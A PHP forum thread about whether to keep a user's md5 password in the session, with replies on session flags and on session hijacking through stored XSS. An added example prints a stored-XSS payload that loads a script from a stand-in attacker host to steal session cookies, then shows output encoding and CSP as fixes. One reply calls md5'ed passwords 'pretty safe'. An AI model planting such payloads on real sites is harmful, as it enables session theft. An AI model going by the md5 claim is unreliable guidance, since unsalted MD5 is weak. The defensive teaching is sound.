Should you store password in session?
bradles
Forum Commoner
Posts: 89
Joined: Wed Jun 30, 2004 10:40 pm


Post by bradles »

Hi All,

Is it a bad idea to store a user's md5 password in a session? Can we get by without it being in there?

Sorry... I'm fairly new to writing a login script.

Brad.
rehfeld
Forum Regular
Posts: 741
Joined: Mon Oct 18, 2004 8:14 pm

Post by rehfeld »

It's not that bad. It really depends how safe you need to be. If it's md5'ed it's pretty safe though. Your weak points are likely in other places.

But it would probably be better to just use something like

<?php
session_start();

// $username and $password come from the login form. The credential check
// itself is a placeholder here: credentials_are_valid() stands for whatever
// lookup and hash comparison your application does.
if (credentials_are_valid($username, $password)) {
    $_SESSION['logged_in'] = true;
}


// then just check on subsequent pages (after session_start())

if (empty($_SESSION['logged_in'])) {
    echo 'not logged in';
} else {
    // ok
}
bradles
Forum Commoner
Posts: 89
Joined: Wed Jun 30, 2004 10:40 pm

Post by bradles »

Thanks rehfeld. Much appreciated.
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto

Post by John Cartwright »

bradles wrote:
Thanks rehfeld. Much appreciated.

To answer your question I would recommend you do not. MD5 hashes can be broken, and sessions can be hijacked. If someone REALLY wanted to, with a bit of research it could be accomplished.
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

As above - password in session is risky. It's low risk, but it's there all the same.

I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ JavaScript, etc. in any text they submit - for example setting something simple like an MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...:(

Something to think about...
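The stored-XSS path Maugrim describes, as an added example that is not part of the original post: a profile field rendered raw next to the same field rendered with output encoding. The profile record, the `attacker.example` host and the `steal.js` name are constructed for illustration; nothing here is a real site or payload.

```php
<?php
// Added example: stored XSS through a free-text profile field, vulnerable vs fixed.
declare(strict_types=1);

// Constructed: what an attacker saves as their "MSN contact". Once echoed into any
// page, every visitor's browser loads the external script, which can read
// document.cookie and send the session id to the attacker.
$profile = [
    'username' => 'mallory',
    'msn'      => '<script src="http://attacker.example/steal.js"></script>',
];

// Vulnerable: the stored string is interpolated straight into HTML.
function render_profile_vulnerable(array $p): string
{
    return "<p>MSN: {$p['msn']}</p>";
}

// Fixed: encode at output time for the HTML context. ENT_QUOTES also escapes
// quotes so the same helper is safe inside attributes; ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently truncating the output.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_profile_safe(array $p): string
{
    return '<p>MSN: ' . e($p['msn']) . '</p>';
}

// Defence in depth for the case where an encoding slip gets through: forbid
// scripts from other origins, so a tag pointing at attacker.example does not load.
function send_csp(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

send_csp();
echo render_profile_vulnerable($profile), PHP_EOL;
echo render_profile_safe($profile), PHP_EOL;
```

The encoded version prints the tag as literal text (`&lt;script ...&gt;`) rather than executing it. Encoding belongs at output, per context (HTML body, attribute, URL, JavaScript), not at input: stripping tags on the way in misses encodings the filter did not anticipate and corrupts legitimate text. An HttpOnly flag on the session cookie complements this by keeping the id out of `document.cookie` even when a script does run.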
John Cartwright
Site Admin
Posts: 11470
Joined: Tue Dec 23, 2003 2:10 am
Location: Toronto

Post by John Cartwright »

Maugrim_The_Reaper wrote:
As above - password in session is risky. It's low risk, but it's there all the same.

I'd be far more worried about having a user's session hijacked. This is entirely possible using XSS (cross site scripting). You can look it up in more detail by googling, but it boils down to ensuring users cannot employ JavaScript, etc. in any text they submit - for example setting something simple like an MSN contact detail to point to a js file using script tags which steals some user cookie details - like sessid...:(

Something to think about...
hehe, nice idea lol
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

It's not so funny when it happens to you...:) I've seen it in action on a test case.